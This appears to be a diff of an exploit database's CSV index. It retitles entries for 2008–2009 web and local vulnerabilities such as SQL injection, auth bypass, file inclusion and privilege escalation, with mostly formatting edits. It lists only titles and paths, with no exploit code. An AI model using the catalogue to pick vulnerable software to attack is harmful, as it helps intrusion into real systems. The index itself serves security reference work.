1.1 Auth Bypass Vulnerability",2008-11-08,Stack,php,webapps,0 7071,platforms/php/webapps/7071.txt,"ExoPHPDesk 1.2 Final (Auth Bypass) SQL Injection Vulnerability",2008-11-09,Cyber-Zone,php,webapps,0 7072,platforms/php/webapps/7072.txt,"ZEEMATRI 3.0 (bannerclick.php adid) SQL Injection Vulnerability",2008-11-09,"Hussin X",php,webapps,0 7074,platforms/php/webapps/7074.txt,"X10media Mp3 Search Engine <= 1.6 Remote File Disclosure Vulnerability",2008-11-09,THUNDER,php,webapps,0 -7075,platforms/jsp/webapps/7075.txt,"Openfire Server <= 3.6.0a (Auth Bypass/SQL/XSS) Multiple Vulnerabilities",2008-11-09,"Andreas Kurtz",jsp,webapps,0 +7075,platforms/jsp/webapps/7075.txt,"Openfire Server <= 3.6.0a (Auth Bypass/SQL/XSS) Multiple Vulnerabilities",2008-11-09,"Andreas Kurtz",jsp,webapps,0 7076,platforms/php/webapps/7076.txt,"Collabtive 0.4.8 (XSS/Auth Bypass/Upload) Multiple Vulnerabilities",2008-11-10,USH,php,webapps,0 7077,platforms/php/webapps/7077.txt,"OTManager CMS 2.4 (Tipo) Remote File Inclusion Vulnerability",2008-11-10,Colt7r,php,webapps,0 7078,platforms/php/webapps/7078.txt,"Joomla Component JooBlog 0.1.1 (PostID) SQL Injection Vulnerability",2008-11-10,boom3rang,php,webapps,0 @@ -6724,10 +6724,10 @@ id,file,description,date,author,platform,type,port 7171,platforms/multiple/local/7171.txt,"PHP 5.2.6 (error_log) safe_mode Bypass Vulnerability",2008-11-20,SecurityReason,multiple,local,0 7172,platforms/php/webapps/7172.txt,"NatterChat 1.1 (Auth Bypass) Remote SQL Injection Vulnerability",2008-11-20,Bl@ckbe@rD,php,webapps,0 7173,platforms/php/webapps/7173.php,"PHP-Fusion 7.00.1 (messages.php) Remote SQL Injection Exploit",2008-11-20,irk4z,php,webapps,0 -7174,platforms/php/webapps/7174.txt,"vBulletin 3.7.3 Visitor Message XSS/XSRF + worm Exploit",2008-11-20,Mx,php,webapps,0 +7174,platforms/php/webapps/7174.txt,"vBulletin 3.7.3 - Visitor Message CSRF + Worm Exploit",2008-11-20,Mx,php,webapps,0 7175,platforms/php/webapps/7175.txt,"Natterchat 1.12 (Auth Bypass) Remote SQL Injection Vulnerability",2008-11-20,Stack,php,webapps,0 7176,platforms/php/webapps/7176.txt,"ToursManager (tourview.php tourid) Blind SQL Injection Vulnerability",2008-11-20,XaDoS,php,webapps,0 -7177,platforms/linux/local/7177.c,"Oracle Database Vault ptrace(2) Privilege Escalation Exploit",2008-11-20,"Jakub Wartak",linux,local,0 +7177,platforms/linux/local/7177.c,"Oracle Database Vault ptrace(2) Privilege Escalation Exploit",2008-11-20,"Jakub Wartak",linux,local,0 7178,platforms/windows/dos/7178.txt,"BitDefender (module pdf.xmd) Infinite Loop Denial of Service PoC",2008-11-20,ProTeuS,windows,dos,0 7179,platforms/php/webapps/7179.txt,"NatterChat 1.1 Remote Admin Bypass Vulnerability",2008-11-20,Stack,php,webapps,0 7180,platforms/php/webapps/7180.txt,"VCalendar (VCalendar.mdb) Remote Database Disclosure Vulnerability",2008-11-20,Swan,php,webapps,0 @@ -6756,8 +6756,8 @@ id,file,description,date,author,platform,type,port 7208,platforms/php/webapps/7208.txt,"NetArtMedia Real Estate Portal 1.2 (ad_id) SQL Injection Vuln",2008-11-24,"Hussin X",php,webapps,0 7209,platforms/windows/dos/7209.pl,"W3C Amaya 10.1 Web Browser (URL Bar) Remote Stack Overflow PoC",2008-11-24,r0ut3r,windows,dos,0 7210,platforms/php/webapps/7210.txt,"Goople Cms 1.7 Arbitrary Code Execution Vulnerability",2008-11-24,x0r,php,webapps,0 -7211,platforms/php/webapps/7211.php,"VideoScript 3.0 <= 4.0.1.50 Official Shell Injection Exploit",2008-11-24,G4N0K,php,webapps,0 -7212,platforms/php/webapps/7212.php,"VideoScript 3.0 <= 4.1.5.55 Unofficial Shell Injection Exploit",2008-11-24,G4N0K,php,webapps,0 +7211,platforms/php/webapps/7211.php,"VideoScript 3.0 <= 4.0.1.50 - Official Shell Injection Exploit",2008-11-24,G4N0K,php,webapps,0 +7212,platforms/php/webapps/7212.php,"VideoScript 3.0 <= 4.1.5.55 - Unofficial Shell Injection Exploit",2008-11-24,G4N0K,php,webapps,0 7213,platforms/windows/dos/7213.pl,"W3C Amaya 10.1 Web Browser (id) Remote Stack Overflow PoC",2008-11-24,r0ut3r,windows,dos,0 7214,platforms/php/webapps/7214.txt,"FTPzik (XSS/LFI) Multiple Remote Vulnerabilities",2008-11-24,JiKo,php,webapps,0 7215,platforms/php/webapps/7215.txt,"Bandwebsite 1.5 (SQL/XSS) Multiple Remote Vulnerabilities",2008-11-24,ZoRLu,php,webapps,0 @@ -6809,7 +6809,7 @@ id,file,description,date,author,platform,type,port 7261,platforms/php/webapps/7261.txt,"Basic PHP CMS (index.php id) Blind SQL Injection Vulnerability",2008-11-28,"CWH Underground",php,webapps,0 7262,platforms/windows/dos/7262.pl,"Microsoft Office Communicator (SIP) Remote Denial of Service Exploit",2008-11-28,"Praveen Darshanam",windows,dos,0 7263,platforms/php/webapps/7263.txt,"Booking Centre 2.01 (Auth Bypass) SQL Injection Vulnerability",2008-11-28,MrDoug,php,webapps,0 -7264,platforms/windows/local/7264.txt,"Apache Tomcat runtime.getRuntime().exec() Privilege Escalation (win)",2008-11-28,Abysssec,windows,local,0 +7264,platforms/windows/local/7264.txt,"Apache Tomcat runtime.getRuntime().exec() Privilege Escalation (win)",2008-11-28,Abysssec,windows,local,0 7265,platforms/php/webapps/7265.txt,"Web Calendar System <= 3.40 (XSS/SQL) Multiple Remote Vulnerabilities",2008-11-28,Bl@ckbe@rD,php,webapps,0 7266,platforms/php/webapps/7266.pl,"All Club CMS <= 0.0.2 Remote DB Config Retrieve Exploit",2008-11-28,StAkeR,php,webapps,0 7267,platforms/php/webapps/7267.txt,"SailPlanner 0.3a (Auth Bypass) SQL Injection Vulnerability",2008-11-28,JiKo,php,webapps,0 @@ -6817,7 +6817,7 @@ id,file,description,date,author,platform,type,port 7269,platforms/php/webapps/7269.pl,"CMS little (index.php term) Remote SQL Injection Exploit",2008-11-28,"CWH Underground",php,webapps,0 7270,platforms/php/webapps/7270.txt,"ReVou Twitter Clone (Auth Bypass) SQL Injection Vulnerability",2008-11-28,R3d-D3v!L,php,webapps,0 7271,platforms/php/webapps/7271.txt,"Ocean12 FAQ Manager Pro (ID) Blind SQL Injection Vulnerabillity",2008-11-28,Stack,php,webapps,0 -7273,platforms/asp/webapps/7273.txt,"Active Force Matrix v2 (Auth Bypass) Remote SQL Injection Vulnerability",2008-11-29,R3d-D3v!L,asp,webapps,0 +7273,platforms/asp/webapps/7273.txt,"Active Force Matrix 2 - (Auth Bypass) Remote SQL Injection Vulnerability",2008-11-29,R3d-D3v!L,asp,webapps,0 7274,platforms/asp/webapps/7274.txt,"ASPReferral 5.3 (AccountID) Blind SQL Injection Vulnerability",2008-11-29,R3d-D3v!L,asp,webapps,0 7275,platforms/asp/webapps/7275.txt,"ActiveVotes 2.2 (Auth Bypass) Remote SQL Injection Vulnerability",2008-11-29,R3d-D3v!L,asp,webapps,0 7276,platforms/asp/webapps/7276.txt,"Active Test 2.1 (Auth Bypass) Remote SQL Injection Vulnerability",2008-11-29,R3d-D3v!L,asp,webapps,0 @@ -6833,7 +6833,7 @@ id,file,description,date,author,platform,type,port 7286,platforms/php/webapps/7286.txt,"OraMon 2.0.1 Remote Config File Disclosure Vulnerability",2008-11-29,ahmadbady,php,webapps,0 7287,platforms/asp/webapps/7287.txt,"ActiveVotes 2.2 (AccountID) Blind SQL Injection Vulnerability",2008-11-29,R3d-D3v!L,asp,webapps,0 7288,platforms/asp/webapps/7288.txt,"Active Web Mail v 4 Blind SQL Injection Vulnerability",2008-11-29,R3d-D3v!L,asp,webapps,0 -7289,platforms/php/webapps/7289.txt,"Active Price Comparison v4 (ProductID) Blind SQL Injection Vulnerability",2008-11-30,R3d-D3v!L,php,webapps,0 +7289,platforms/php/webapps/7289.txt,"Active Price Comparison 4 - (ProductID) Blind SQL Injection Vulnerability",2008-11-30,R3d-D3v!L,php,webapps,0 7290,platforms/php/webapps/7290.txt,"Active Bids 3.5 (ItemID) Blind SQL Injection Vulnerability",2008-11-29,Stack,php,webapps,0 7291,platforms/php/webapps/7291.pl,"OpenForum 0.66 Beta Remote Reset Admin Password Exploit",2008-11-29,"CWH Underground",php,webapps,0 7292,platforms/asp/webapps/7292.txt,"ASPThai.NET Forum 8.5 Remote Database Disclosure Vulnerability",2008-11-29,"CWH Underground",asp,webapps,0 @@ -6853,11 +6853,11 @@ id,file,description,date,author,platform,type,port 7306,platforms/php/webapps/7306.txt,"Minimal Ablog 0.4 (SQL/FU/Bypass) Multiple Remote Vulnerabilities",2008-11-30,NoGe,php,webapps,0 7307,platforms/windows/dos/7307.txt,"Electronics Workbench (EWB File) Local Stack Overflow PoC",2008-11-30,Zigma,windows,dos,0 7308,platforms/php/webapps/7308.txt,"cpCommerce 1.2.6 (URL Rewrite) Input variable overwrite / Auth bypass",2008-11-30,girex,php,webapps,0 -7309,platforms/windows/local/7309.pl,"Cain & Abel <= v4.9.24 .RDP Stack Overflow Exploit",2008-11-30,SkD,windows,local,0 +7309,platforms/windows/local/7309.pl,"Cain & Abel <= 4.9.24 - .RDP Stack Overflow Exploit",2008-11-30,SkD,windows,local,0 7310,platforms/php/webapps/7310.txt,"Broadcast Machine 0.1 Multiple Remote File Inclusion Vulnerabilities",2008-11-30,NoGe,php,webapps,0 7311,platforms/php/webapps/7311.txt,"z1exchange 1.0 (edit.php site) Remote SQL Injection Vulnerability",2008-12-01,JiKo,php,webapps,0 7312,platforms/php/webapps/7312.txt,"Andy's PHP Knowledgebase 0.92.9 Arbitrary File Upload Vulnerability",2008-12-01,"CWH Underground",php,webapps,0 -7313,platforms/linux/local/7313.sh,"Debian GNU/Linux (symlink attack in login) Arbitrary File Ownership PoC",2008-12-01,"Paul Szabo",linux,local,0 +7313,platforms/linux/local/7313.sh,"Debian GNU/Linux (symlink attack in login) Arbitrary File Ownership PoC",2008-12-01,"Paul Szabo",linux,local,0 7314,platforms/windows/dos/7314.txt,"Maxum Rumpus 6.0 Multiple Remote Buffer Overflow Vulnerabilities",2008-12-01,"BLUE MOON",windows,dos,0 7315,platforms/php/webapps/7315.txt,"E.Z. Poll v.2 (Auth Bypass) Remote SQL Injection Vulnerability",2008-12-01,t0fx,php,webapps,0 7316,platforms/asp/webapps/7316.txt,"ASPPortal 3.2.5 (ASPPortal.mdb) Database Disclosure Vulnreability",2008-12-01,"CWH Underground",asp,webapps,0 @@ -6906,7 +6906,7 @@ id,file,description,date,author,platform,type,port 7361,platforms/asp/webapps/7361.txt,"ASP PORTAL (xportal.mdb) Remote Database Disclosure Vulnerability",2008-12-06,ZoRLu,asp,webapps,0 7362,platforms/windows/dos/7362.py,"DesignWorks Professional 4.3.1 Local .CCT File Stack BOF PoC",2008-12-06,Cnaph,windows,dos,0 7363,platforms/php/webapps/7363.txt,"phpPgAdmin <= 4.2.1 (_language) Local File Inclusion Vulnerability",2008-12-06,dun,php,webapps,0 -7364,platforms/php/webapps/7364.php,"IPNPro3 <= 1.44 Admin Password Changing Exploit",2008-12-07,G4N0K,php,webapps,0 +7364,platforms/php/webapps/7364.php,"IPNPro3 <= 1.44 - Admin Password Changing Exploit",2008-12-07,G4N0K,php,webapps,0 7365,platforms/php/webapps/7365.php,"DL PayCart <= 1.34 Admin Password Changing Exploit",2008-12-07,G4N0K,php,webapps,0 7366,platforms/php/webapps/7366.php,"Bonza Cart <= 1.10 Admin Password Changing Exploit",2008-12-07,G4N0K,php,webapps,0 7367,platforms/php/webapps/7367.php,"PayPal eStore Admin Password Changing Exploit",2008-12-07,G4N0K,php,webapps,0 @@ -6924,14 +6924,14 @@ id,file,description,date,author,platform,type,port 7379,platforms/php/webapps/7379.txt,"MG2 0.5.1 (filename) Remote Code Execution Vulnerability",2008-12-08,"Alfons Luja",php,webapps,0 7380,platforms/php/webapps/7380.txt,"XOOPS 2.3.1 Multiple Local File Inclusion Vulnerabilities",2008-12-08,DSecRG,php,webapps,0 7381,platforms/php/webapps/7381.txt,"SIU Guarani Multiple Remote Vulnerabilities",2008-12-08,"Ubik & proudhon",php,webapps,0 -7382,platforms/php/webapps/7382.txt,"phpMyAdmin 3.1.0 (XSRF) SQL Injection Vulnerability",2008-12-08,"Michael Brooks",php,webapps,0 +7382,platforms/php/webapps/7382.txt,"phpMyAdmin 3.1.0 - (CSRF) SQL Injection Vulnerability",2008-12-08,"Michael Brooks",php,webapps,0 7383,platforms/php/webapps/7383.txt,"Simple Directory Listing 2 Cross Site File Upload Vulnerability",2008-12-08,"Michael Brooks",php,webapps,0 -7384,platforms/windows/remote/7384.txt,"XAMPP 1.6.8 (XSRF) Change Administrative Password Exploit",2008-12-08,"Michael Brooks",windows,remote,0 -7385,platforms/php/webapps/7385.txt,"Secure Downloads v2.0.0r for vBulletin SQL Injection Vulnerability",2008-12-08,Cnaph,php,webapps,0 +7384,platforms/windows/remote/7384.txt,"XAMPP 1.6.8 - (CSRF) Change Administrative Password Exploit",2008-12-08,"Michael Brooks",windows,remote,0 +7385,platforms/php/webapps/7385.txt,"vBulletin Secure Downloads 2.0.0r - SQL Injection Vulnerability",2008-12-08,Cnaph,php,webapps,0 7386,platforms/php/webapps/7386.pl,"phpBB 3 (Mod Tag Board <= 4) Remote Blind SQL Injection Exploit",2008-12-08,StAkeR,php,webapps,0 7387,platforms/windows/dos/7387.py,"Neostrada Livebox Router Remote Network Down PoC Exploit",2008-12-08,0in,windows,dos,0 7388,platforms/php/webapps/7388.txt,"WebCAF <= 1.4 (LFI/RCE) Multiple Remote Vulnerabilities",2008-12-08,dun,php,webapps,0 -7389,platforms/hardware/remote/7389.htm,"DD-WRT v24-sp1 (XSRF) Cross Site Reference Forgery Exploit",2008-12-08,"Michael Brooks",hardware,remote,0 +7389,platforms/hardware/remote/7389.htm,"DD-WRT v24-sp1 - (CSRF) Cross Site Reference Forgery Exploit",2008-12-08,"Michael Brooks",hardware,remote,0 7390,platforms/asp/webapps/7390.txt,"Professional Download Assistant 0.1 (Auth Bypass) SQL Injection Vuln",2008-12-09,ZoRLu,asp,webapps,0 7391,platforms/asp/webapps/7391.txt,"Poll Pro 2.0 (Auth Bypass) Remote SQL Injection Vulnerability",2008-12-09,AlpHaNiX,asp,webapps,0 7392,platforms/php/webapps/7392.txt,"PHPmyGallery 1.0beta2 (RFI/LFI) Multiple Remote Vulnerabilities",2008-12-09,ZoRLu,php,webapps,0 @@ -6950,7 +6950,7 @@ id,file,description,date,author,platform,type,port 7406,platforms/php/webapps/7406.php,"eZ Publish < 3.9.5/3.10.1/4.0.1 Privilege Escalation Exploit",2008-12-10,s4avrd0w,php,webapps,0 7407,platforms/php/webapps/7407.txt,"Webmaster Marketplace (member.php u) SQL Injection Vulnerability",2008-12-10,"Hussin X",php,webapps,0 7408,platforms/php/webapps/7408.txt,"Living Local 1.1 (XSS-RFU) Multiple Remote Vulnerabilities",2008-12-10,Bgh7,php,webapps,0 -7409,platforms/php/webapps/7409.txt,"Pro Chat Rooms 3.0.2 (XSS/CSRF) Multiple Vulnerabilities",2008-12-10,ZynbER,php,webapps,0 +7409,platforms/php/webapps/7409.txt,"Pro Chat Rooms 3.0.2 (XSS/CSRF) Multiple Vulnerabilities",2008-12-10,ZynbER,php,webapps,0 7410,platforms/windows/remote/7410.htm,"MS Internet Explorer XML Parsing Buffer Overflow Exploit (vista) 0day",2008-12-10,muts,windows,remote,0 7411,platforms/php/webapps/7411.txt,"Butterfly Organizer 2.0.1 (view.php id) SQL Injection Vulnerability",2008-12-10,Osirys,php,webapps,0 7412,platforms/asp/webapps/7412.txt,"CF SHOPKART 5.2.2 (SQL/DD) Multiple Remote Vulnerabilities",2008-12-10,AlpHaNiX,asp,webapps,0 @@ -6986,7 +6986,7 @@ id,file,description,date,author,platform,type,port 7442,platforms/windows/remote/7442.txt,"TmaxSoft JEUS Alternate Data Streams File Disclosure Vulnerability",2008-12-12,"Simon Ryeo",windows,remote,0 7443,platforms/php/webapps/7443.txt,"FlexPHPNews 0.0.6 & PRO (Auth Bypass) SQL Injection Vulnerability",2008-12-14,Osirys,php,webapps,0 7444,platforms/php/webapps/7444.txt,"Simple Text-File Login script 1.0.6 (DD/RFI) Multiple Vulnerabilities",2008-12-14,Osirys,php,webapps,0 -7445,platforms/asp/webapps/7445.txt,"Discussion Web v4 Remote Database Disclosure Vulnerability",2008-12-14,Pouya_Server,asp,webapps,0 +7445,platforms/asp/webapps/7445.txt,"Discussion Web 4 - Remote Database Disclosure Vulnerability",2008-12-14,Pouya_Server,asp,webapps,0 7446,platforms/asp/webapps/7446.txt,"ASPired2Quote (quote.mdb) Remote Database Disclosure Vulnerability",2008-12-14,Pouya_Server,asp,webapps,0 7447,platforms/asp/webapps/7447.txt,"ASP-DEV Internal E-Mail System (Auth Bypass) SQL Injection Vuln",2008-12-14,Pouya_Server,asp,webapps,0 7448,platforms/php/webapps/7448.txt,"AutositePHP 2.0.3 (LFI/CSRF/Edit File) Multiple Remote Vulnerabilities",2008-12-14,SirGod,php,webapps,0 @@ -7000,12 +7000,12 @@ id,file,description,date,author,platform,type,port 7456,platforms/php/webapps/7456.txt,"Availscript Article Script Remote File Upload Vulnerability",2008-12-14,S.W.A.T.,php,webapps,0 7457,platforms/php/webapps/7457.txt,"Availscript Classmate Script Remote File Upload Vulnerability",2008-12-14,S.W.A.T.,php,webapps,0 7458,platforms/php/webapps/7458.txt,"Mediatheka 4.2 (index.php lang) Local File Inclusion Vulnerability",2008-12-14,Osirys,php,webapps,0 -7459,platforms/php/webapps/7459.txt,"CFAGCMS v1 Remote File Inclusion Vulnerabilities",2008-12-14,BeyazKurt,php,webapps,0 +7459,platforms/php/webapps/7459.txt,"CFAGCMS 1- Remote File Inclusion Vulnerabilities",2008-12-14,BeyazKurt,php,webapps,0 7460,platforms/windows/dos/7460.html,"EvansFTP (EvansFTP.ocx) Remote Buffer Overflow PoC",2008-12-14,Bl@ckbe@rD,windows,dos,0 7461,platforms/php/webapps/7461.txt,"Flatnux html/javascript Injection Cookie Grabber Exploit",2008-12-14,gmda,php,webapps,0 7462,platforms/asp/webapps/7462.txt,"ASPSiteWare Home Builder 1.0/2.0 SQL Injection Vulnerability",2008-12-14,AlpHaNiX,asp,webapps,0 -7463,platforms/php/webapps/7463.txt,"ASPSiteWare Automotive Dealer V1/V2 SQL Injection Vulnerability",2008-12-14,AlpHaNiX,php,webapps,0 -7464,platforms/asp/webapps/7464.txt,"ASPSiteWare RealtyListing V1/V2 SQL Injection Vulnerabilities",2008-12-14,AlpHaNiX,asp,webapps,0 +7463,platforms/php/webapps/7463.txt,"ASPSiteWare Automotive Dealer 1.0 & 2.0 - SQL Injection Vulnerability",2008-12-14,AlpHaNiX,php,webapps,0 +7464,platforms/asp/webapps/7464.txt,"ASPSiteWare RealtyListing 1.0 & 2.0 - SQL Injection Vulnerabilities",2008-12-14,AlpHaNiX,asp,webapps,0 7465,platforms/php/webapps/7465.txt,"IsWeb CMS 3.0 (SQL/XSS) Multiple Remote Vulnerabilities",2008-12-14,XaDoS,php,webapps,0 7466,platforms/asp/webapps/7466.txt,"Forest Blog 1.3.2 (blog.mdb) Remote Database Disclosure Vulnerability",2008-12-15,"Cold Zero",asp,webapps,0 7467,platforms/multiple/dos/7467.txt,"Amaya Web Browser 10.0.1/10.1-pre5 (html tag) Buffer Overflow PoC",2008-12-15,webDEViL,multiple,dos,0 @@ -7024,7 +7024,7 @@ id,file,description,date,author,platform,type,port 7480,platforms/php/webapps/7480.txt,"CadeNix (cid) Remote SQL Injection Vulnerability",2008-12-15,HaCkeR_EgY,php,webapps,0 7481,platforms/php/webapps/7481.txt,"WorkSimple 1.2.1 RFI / Sensitive Data Disclosure Vulnerabilities",2008-12-15,Osirys,php,webapps,0 7482,platforms/php/webapps/7482.txt,"Aperto Blog 0.1.1 Local File Inclusion / SQL Injection Vulnerabilities",2008-12-15,NoGe,php,webapps,0 -7483,platforms/php/webapps/7483.txt,"CFAGCMS v1 (right.php title) SQL Injection Vulnerability",2008-12-15,ZoRLu,php,webapps,0 +7483,platforms/php/webapps/7483.txt,"CFAGCMS 1 - (right.php title) SQL Injection Vulnerability",2008-12-15,ZoRLu,php,webapps,0 7484,platforms/asp/webapps/7484.txt,"Click&BaneX Multiple Remote SQL Injection Vulnerabilities",2008-12-15,AlpHaNiX,asp,webapps,0 7485,platforms/asp/webapps/7485.txt,"ClickAndEmaiL (SQL/XSS) Multiple Remote Vulnerabilities",2008-12-15,AlpHaNiX,asp,webapps,0 7486,platforms/asp/webapps/7486.txt,"Click&Rank (SQL/XSS) Multiple Remote Vulnerabilities",2008-12-15,AlpHaNiX,asp,webapps,0 @@ -7037,12 +7037,12 @@ id,file,description,date,author,platform,type,port 7493,platforms/php/webapps/7493.txt,"Liberum Help Desk 0.97.3 (SQL/DD) Remote Vulnerabilities",2008-12-16,"Cold Zero",php,webapps,0 7494,platforms/php/webapps/7494.txt,"Zelta E Store (RFU/BYPASS/R-SQL/B-SQL) Multiple Vulnerabilities",2008-12-16,ZoRLu,php,webapps,0 7495,platforms/asp/webapps/7495.txt,"Gnews Publisher .NET (authors.asp authorID) SQL Injection Vulnerability",2008-12-16,AlpHaNiX,asp,webapps,0 -7496,platforms/hardware/remote/7496.txt,"Barracuda Spam Firewall v3.5.11.020, Model 600 SQL Injection Vuln",2008-12-16,"Marian Ventuneac",hardware,remote,0 +7496,platforms/hardware/remote/7496.txt,"Barracuda Spam Firewall 3.5.11.020, Model 600 - SQL Injection Vuln",2008-12-16,"Marian Ventuneac",hardware,remote,0 7497,platforms/php/webapps/7497.txt,"RSMScript 1.21 XSS/Insecure Cookie Handling Vulnerabilities",2008-12-17,Osirys,php,webapps,0 7499,platforms/asp/webapps/7499.txt,"BP Blog 6.0/7.0/8.0/9.0 Remote Database Disclosure Vulnerability",2008-12-17,Dxil,asp,webapps,0 7500,platforms/php/webapps/7500.txt,"K&S Shopsysteme Arbitrary Remote File Upload Vulnerability",2008-12-17,mNt,php,webapps,0 7501,platforms/windows/local/7501.asp,"Microsoft SQL Server sp_replwritetovarbin() Heap Overflow Exploit",2008-12-17,"Guido Landi",windows,local,0 -7502,platforms/php/webapps/7502.txt,"r.cms v2 Multiple SQL Injection Vulnerabilities",2008-12-17,Lidloses_Auge,php,webapps,0 +7502,platforms/php/webapps/7502.txt,"r.cms 2.0 - Multiple SQL Injection Vulnerabilities",2008-12-17,Lidloses_Auge,php,webapps,0 7503,platforms/multiple/local/7503.txt,"PHP python extension safe_mode Bypass Local Vulnerability",2008-12-17,"Amir Salmani",multiple,local,0 7504,platforms/php/webapps/7504.txt,"Joomla Component Tech Article 1.x (item) SQL Injection Vulnerability",2008-12-17,InjEctOr5,php,webapps,0 7505,platforms/windows/remote/7505.html,"Phoenician Casino FlashAX ActiveX Remote Code Execution Exploit",2008-12-17,e.wiZz!,windows,remote,0 @@ -7050,9 +7050,9 @@ id,file,description,date,author,platform,type,port 7507,platforms/php/webapps/7507.pl,"Lizardware CMS <= 0.6.0 Blind SQL Injection Exploit",2008-12-17,StAkeR,php,webapps,0 7508,platforms/asp/webapps/7508.txt,"QuickerSite Easy CMS (QuickerSite.mdb) Database Disclosure Vulnerability",2008-12-17,AlpHaNiX,asp,webapps,0 7509,platforms/php/webapps/7509.txt,"Mini File Host 1.x Arbitrary PHP File Upload Vulnerability",2008-12-18,Pouya_Server,php,webapps,0 -7510,platforms/php/webapps/7510.txt,"2532|Gigs 1.2.2 Stable Multiple Remote Vulnerabilities",2008-12-18,Osirys,php,webapps,0 -7511,platforms/php/webapps/7511.txt,"2532|Gigs 1.2.2 Stable Remote Login Bypass Vulnerability",2008-12-18,StAkeR,php,webapps,0 -7512,platforms/php/webapps/7512.php,"2532|Gigs 1.2.2 Stable Remote Command Execution Exploit",2008-12-18,StAkeR,php,webapps,0 +7510,platforms/php/webapps/7510.txt,"2532/Gigs 1.2.2 - Stable Multiple Remote Vulnerabilities",2008-12-18,Osirys,php,webapps,0 +7511,platforms/php/webapps/7511.txt,"2532/Gigs 1.2.2 - Stable Remote Login Bypass Vulnerability",2008-12-18,StAkeR,php,webapps,0 +7512,platforms/php/webapps/7512.php,"2532/Gigs 1.2.2 - Stable Remote Command Execution Exploit",2008-12-18,StAkeR,php,webapps,0 7513,platforms/php/webapps/7513.txt,"Calendar Script 1.1 Insecure Cookie Handling Vulnerability",2008-12-18,Osirys,php,webapps,0 7514,platforms/php/webapps/7514.txt,"I-Rater Basic (messages.php) Remote SQL Injection Vulnerability",2008-12-18,boom3rang,php,webapps,0 7515,platforms/php/webapps/7515.txt,"Phpclanwebsite <= 1.23.3 Fix Pack #5 Multiple Remote Vulnerabilities",2008-12-18,s4avrd0w,php,webapps,0 @@ -7128,7 +7128,7 @@ id,file,description,date,author,platform,type,port 7585,platforms/windows/dos/7585.txt,"MS Windows Media Player * (.WAV) Remote Crash PoC",2008-12-28,"laurent gaffiĂ© ",windows,dos,0 7586,platforms/php/webapps/7586.txt,"Miniweb 2.0 (Auth Bypass) SQL Injection Vulnerability",2008-12-28,bizzit,php,webapps,0 7587,platforms/php/webapps/7587.txt,"Joomla Component PAX Gallery 0.1 Blind SQL Injection Vulnerability",2008-12-28,XaDoS,php,webapps,0 -7589,platforms/windows/dos/7589.pl,"BulletProof FTP Client (.bps File) Local Stack Overflow PoC",2008-12-28,Stack,windows,dos,0 +7589,platforms/windows/dos/7589.pl,"BulletProof FTP Client (.bps File) Local Stack Overflow PoC",2008-12-28,Stack,windows,dos,0 7592,platforms/windows/dos/7592.pl,"Hex Workshop 5.1.4 (Color Mapping File) Local Buffer Overflow PoC",2008-12-28,Encrypt3d.M!nd,windows,dos,0 7593,platforms/php/webapps/7593.pl,"DeluxeBB <= 1.2 Remote Blind SQL Injection Exploit",2008-12-28,StAkeR,php,webapps,0 7594,platforms/windows/remote/7594.html,"Chilkat FTP ActiveX (SaveLastError) Insecure Method Exploit",2008-12-28,callAX,windows,remote,0 @@ -7140,8 +7140,8 @@ id,file,description,date,author,platform,type,port 7600,platforms/php/webapps/7600.pl,"Flexphplink Pro Arbitrary File Upload Exploit",2008-12-28,Osirys,php,webapps,0 7601,platforms/php/webapps/7601.txt,"Silentum LoginSys 1.0.0 Insecure Cookie Handling vulnerability",2008-12-28,Osirys,php,webapps,0 7602,platforms/php/webapps/7602.txt,"webClassifieds 2005 (Auth Bypass) SQL Injection Vulnerability",2008-12-29,AnGeL25dZ,php,webapps,0 -7603,platforms/php/webapps/7603.txt,"eDNews v2 (lg) Local File Inclusion Vulnerability",2008-12-29,GoLd_M,php,webapps,0 -7604,platforms/php/webapps/7604.txt,"eDContainer v2.22 (lg) Local File Inclusion Vulnerability",2008-12-29,GoLd_M,php,webapps,0 +7603,platforms/php/webapps/7603.txt,"eDNews 2.0 - (lg) Local File Inclusion Vulnerability",2008-12-29,GoLd_M,php,webapps,0 +7604,platforms/php/webapps/7604.txt,"eDContainer 2.22 - (lg) Local File Inclusion Vulnerability",2008-12-29,GoLd_M,php,webapps,0 7605,platforms/php/webapps/7605.php,"TaskDriver <= 1.3 Remote Change Admin Password Exploit",2008-12-29,cOndemned,php,webapps,0 7606,platforms/php/webapps/7606.txt,"FubarForum 1.6 Admin Bypass Change User Password Vulnerability",2008-12-29,R31P0l,php,webapps,0 7607,platforms/php/webapps/7607.pl,"Ultimate PHP Board <= 2.2.1 (log inj) Privilege Escalation Exploit",2008-12-29,StAkeR,php,webapps,0 @@ -7156,7 +7156,7 @@ id,file,description,date,author,platform,type,port 7616,platforms/php/webapps/7616.txt,"Flexphplink 0.0.x (Auth Bypass) SQL Injection Vulnerability",2008-12-29,x0r,php,webapps,0 7617,platforms/windows/remote/7617.html,"SasCam WebCam Server 2.6.5 ActiveX Remote BOF Exploit",2008-12-29,callAX,windows,remote,0 7618,platforms/linux/local/7618.c,"Linux Kernel < 2.6.26.4 SCTP Kernel Memory Disclosure Exploit",2008-12-29,"Jon Oberheide",linux,local,0 -7619,platforms/php/webapps/7619.txt,"eDNews v2 (eDNews_view.php newsid) SQL Injection Vulnerability",2008-12-29,"Virangar Security",php,webapps,0 +7619,platforms/php/webapps/7619.txt,"eDNews 2.0 - (eDNews_view.php newsid) SQL Injection Vulnerability",2008-12-29,"Virangar Security",php,webapps,0 7620,platforms/php/webapps/7620.txt,"ThePortal 2.2 Arbitrary Remote File Upload Exploit",2008-12-29,siurek22,php,webapps,0 7621,platforms/php/webapps/7621.txt,"PHPAlumni (Acomment.php id) SQL Injection Vulnerability",2008-12-29,Mr.SQL,php,webapps,0 7622,platforms/php/webapps/7622.txt,"Flexcustomer 0.0.6 Admin Login Bypass / Possible PHP code writing",2008-12-29,Osirys,php,webapps,0 @@ -7171,7 +7171,7 @@ id,file,description,date,author,platform,type,port 7631,platforms/php/webapps/7631.txt,"2Capsule (sticker.php id) Remote SQL Injection Vulnerability",2009-01-01,Zenith,php,webapps,0 7632,platforms/hardware/dos/7632.txt,"Nokia S60 SMS/MMS (Curse of Silence) Denial of Service Vulnerability",2009-01-01,"Tobias Engel",hardware,dos,0 7633,platforms/php/webapps/7633.txt,"EggBlog 3.1.10 Change Admin Pass CSRF Vulnerability",2009-01-01,x0r,php,webapps,0 -7634,platforms/windows/dos/7634.pl,"Audacity 1.2.6 (.gro File) Local Buffer Overflow PoC",2009-01-01,Houssamix,windows,dos,0 +7634,platforms/windows/dos/7634.pl,"Audacity 1.2.6 (.gro File) Local Buffer Overflow PoC",2009-01-01,Houssamix,windows,dos,0 